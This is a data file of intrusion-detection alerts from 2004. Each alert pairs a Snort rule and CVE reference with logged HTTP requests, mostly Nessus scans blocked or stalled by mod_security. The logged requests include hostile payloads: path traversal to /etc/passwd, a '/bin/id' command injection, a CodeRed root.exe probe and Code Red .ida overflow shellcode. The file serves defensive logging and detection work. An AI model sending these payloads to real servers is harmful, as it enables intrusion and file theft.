1148		attempted-recon	WEB-MISC Ecommerce import.txt access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:46 2004] "GET /webcart-lite/orders/import.txt HTTP/1.1" 403 314 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart-lite ---------------------------------------- GET /webcart-lite/orders/import.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=96 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1149	Nessus 10049 CVE-1999-0021 BID128	web-application-activity	WEB-CGI count.cgi access	Request: 217.226.156.144 - - [Fri Mar 12 08:37:03 2004] "GET http://www.webhits.de/cgi/Count.cgi?srgb=ff0000&sh=0&prgb=c60000&tr=1&trgb=000000&ft=0&dd=tinyred&df=14218.dat HTTP/1.0" 200 43 Handler: proxy-server Error: mod_security: Warning. Pattern match "/count\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.webhits.de/cgi/Count.cgi?srgb=ff0000&sh=0&prgb=c60000&tr=1&trgb=000000&ft=0&dd=tinyred&df=14218.dat HTTP/1.0 Accept: / Accept-Language: de Cookie: WEBHCA14218:aaGorLZnc43GY=1100351657; SaneID=217.82.247.61-1078497488116 Host: www.webhits.de Proxy-Connection: close User-Agent: Anonymisiert durch Steganos Internet Anonym 6 mod_security-message: Warning. Pattern match "/count\.cgi" at THE_REQUEST. HTTP/1.0 200 OK Expires: Fri, 12 Mar 2004 14:37:04 GMT Last-Modified: Fri, 12 Mar 2004 13:37:04 GMT Content-Type: image/gif X-Cache: MISS from www.testproxy.net Connection: close
1150		attempted-recon	WEB-MISC Domino catalog.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /catalog.nsf HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/catalog.nsf ---------------------------------------- GET /catalog.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1151		attempted-recon	WEB-MISC Domino domcfg.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:18 2004] "GET /domcfg.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/domcfg.nsf ---------------------------------------- GET /domcfg.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=80 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1152		attempted-recon	WEB-MISC Domino domlog.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:15 2004] "GET /domlog.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/domlog.nsf ---------------------------------------- GET /domlog.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=91 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1153		attempted-recon	WEB-MISC Domino log.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:59 2004] "GET /log.nsf HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/log.nsf] for 50000 ms ---------------------------------------- GET /log.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/log\.nsf" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1154		attempted-recon	WEB-MISC Domino names.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /names.nsf HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/names.nsf ---------------------------------------- GET /names.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1158	Nessus 10365 arachNIDS 465 BID1073 CAN-2000-0242	attempted-recon	WEB-MISC windmail.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:40:25 2004] "GET /cgi-bin/windmail.exe HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/windmail.exe ---------------------------------------- GET /cgi-bin/windmail.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1162	BID1153 CAN-2000-0429	attempted-recon	WEB-MISC cart 32 AdminPwd access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:46 2004] "GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.1" 403 322 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/c32web.exe ---------------------------------------- GET /cgi-bin/c32web.exe/ChangeAdminPassword HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1163	Nessus 10299 CVE-1999-0039 BID374	web-application-activity	WEB-CGI webdist.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:44 2004] "GET /cgi-bin/webdist.cgi HTTP/1.1" 404 299 Handler: cgi-script Error: mod_security: Warning. Pattern match "/webdist\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/webdist.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/webdist\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1165	CAN-1999-1006 BID879	attempted-recon	WEB-MISC Novell Groupwise gwweb.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/GW5 ---------------------------------------- GET /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1167	BID1036 CVE-2000-0192	attempted-recon	WEB-MISC rpm_query access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:34 2004] "GET /cgi-bin/rpm_query HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/rpm_query] for 50000 ms ---------------------------------------- GET /cgi-bin/rpm_query HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/rpm_query" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1172	CVE-1999-1550 BID778 Nessus 10027	web-application-activity	WEB-CGI bigconf.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:32:09 2004] "GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/bigipgui/bigconf.cgi] for 50000 ms ---------------------------------------- GET /bigipgui/bigconf.cgi?command=bigcommand&CommandType=bigpipe HTTP/1.0 Authorization: Basic c3VwcG9ydDpzdXBwb3J0 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1173		attempted-recon	WEB-MISC architext_query.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:57 2004] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/ews/ews/architext_query.pl] for 50000 ms ---------------------------------------- GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/ews/architext_query\.pl" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1174	CVE-1999-0260 BID2002	web-application-activity	WEB-CGI /cgi-bin/jj access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:06 2004] "GET /cgi-bin/jj HTTP/1.1" 404 290 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgi-bin/jj" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/jj HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgi-bin/jj" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1180	arachNIDS 258 BID1485 BID770 CAN-1999-0885	attempted-recon	WEB-MISC get32.exe access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:50 2004] "GET /cgi-bin/get32.exe HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/get32.exe ---------------------------------------- GET /cgi-bin/get32.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1194	CAN-2000-0180 BID1052	web-application-attack	WEB-CGI sojourn.cgi File attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:04 2004] "GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1196	CVE-2000-0207 arachNIDS 290 BID1031	web-application-attack	WEB-CGI SGI InfoSearch fname attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:41:34 2004] "GET /infosrch.cgi?cmd=getdoc&db=man&fname=\|/bin/id HTTP/1.1" 403 296 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/infosrch.cgi ---------------------------------------- GET /infosrch.cgi?cmd=getdoc&db=man&fname=\|/bin/id HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1206	Nessus 10034 CVE-1999-0710	web-application-activity	WEB-CGI cachemgr.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:52 2004] "GET /cgi-bin/cachemgr.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cachemgr.cgi ---------------------------------------- GET /cgi-bin/cachemgr.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1208		web-application-activity	WEB-CGI responder.cgi access	Request: 24.127.175.68 - - [Sat Mar 13 15:35:36 2004] "GET http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; HTTP/1.0" 401 3784 Handler: proxy-server Error: mod_security: Warning. Pattern match "/responder\.cgi" at THE_REQUEST. ---------------------------------------- GET http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: www.bignipplelovers.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://www.bignipplelovers.com/members/index.html/cgi-bin/responder.cgi;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Warning. Pattern match "/responder\.cgi" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="Members" X-Powered-By: PHP/4.1.2 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
1212		attempted-recon	WEB-MISC Admin_files access	Request: 217.160.165.173 - - [Fri Mar 12 22:31:15 2004] "GET /Admin_files/ HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/Admin_files/] for 50000 ms ---------------------------------------- GET /Admin_files/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/admin_files" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1213		attempted-recon	WEB-MISC backup access	Request: 217.160.165.173 - - [Fri Mar 12 22:31:19 2004] "GET /backups/ HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/backups ---------------------------------------- GET /backups/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1214		attempted-recon	WEB-MISC intranet access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:16 2004] "GET /intranet/browse.php HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/intranet/browse.php] for 50000 ms ---------------------------------------- GET /intranet/browse.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/intranet/" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1217	BID2653 CAN-2000-0074	attempted-recon	WEB-MISC plusmail access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:45 2004] "GET /cgi-bin/plusmail HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/plusmail] for 50000 ms ---------------------------------------- GET /cgi-bin/plusmail HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/plusmail" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1218		attempted-recon	WEB-MISC adminlogin access	Request: 24.127.175.68 - - [Sat Mar 13 23:45:47 2004] "GET http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index.] for 50000 ms ---------------------------------------- GET http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. HTTP/1.0 Cache-Control: no-cache Connection: close Host: www.catalinaxxx.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://www.catalinaxxx.com/members/mebershomepage/index.htm/session/adminlogin?RCpage=/sysadmin/index. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/adminlogin" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1220		attempted-recon	WEB-MISC ultraboard access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:21 2004] "GET /cgi-bin/UltraBoard.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/UltraBoard.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/UltraBoard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/ultraboard" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1222	Nessus 10611 BID2372 CAN-2001-0217	web-application-attack	WEB-CGI pals-cgi arbitrary file access attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:56 2004] "GET /pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1" 403 292 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/pals-cgi ---------------------------------------- GET /pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1230	Nessus 10733 CAN-2001-0432 BID2808	attempted-recon	WEB-MISC VirusWall FtpSave access	Request: 217.160.165.173 - - [Fri Mar 12 22:32:10 2004] "GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/interscan/cgi-bin/FtpSave.dll] for 50000 ms ---------------------------------------- GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/FtpSave\.dll" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1242	BID1065 CAN-2000-0071 arachNIDS 552	web-application-activity	WEB-IIS ISAPI .ida access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /anything.ida HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.ida" at THE_REQUEST. ---------------------------------------- GET /anything.ida HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.ida" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1243	CAN-2000-0071 BID1065 arachNIDS 552	web-application-attack	WEB-IIS ISAPI .ida attempt	Request: 68.48.205.207 - - [Wed Mar 10 19:14:37 2004] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid URL encoding #2 detected. ---------------------------------------- GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-length: 3379 Content-type: text/xml mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1244	BID1065 CAN-2000-0071 arachNIDS 553	web-application-attack	WEB-IIS ISAPI .idq attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:06 2004] "GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/query.idq] for 50000 ms ---------------------------------------- GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "\.idq\?" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1245	BID1065 CAN-2000-0071 arachNIDS 553	web-application-activity	WEB-IIS ISAPI .idq access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:19 2004] "GET /anything.idq HTTP/1.1" 404 292 Handler: (null) Error: mod_security: Warning. Pattern match "\.idq" at THE_REQUEST. ---------------------------------------- GET /anything.idq HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.idq" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1248	MS01-035 CAN-2001-0341 BID2906 arachNIDS 555	web-application-activity	WEB-FRONTPAGE rad fp30reg.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:49 2004] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 301 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 Host: www.testproxy.net Transfer-Encoding: chunked [POST payload not available] HTTP/1.1 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1
1250	BID2936	web-application-attack	WEB-MISC Cisco IOS HTTP configuration attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:31:27 2004] "GET /level/16/exec/show/config/cr HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/level/16/exec/show/config/cr] for 50000 ms ---------------------------------------- GET /level/16/exec/show/config/cr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/exec/" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1256	CA-2001-19	web-application-attack	WEB-IIS CodeRed v2 root.exe access	Request: 68.48.142.117 - - [Tue Mar 9 22:19:35 2004] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/root.exe] for 50000 ms ---------------------------------------- GET /scripts/root.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "/root\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1286		web-application-activity	WEB-IIS _mem_bin access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:45 2004] "GET /_mem_bin/ HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_mem_bin ---------------------------------------- GET /_mem_bin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=57 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
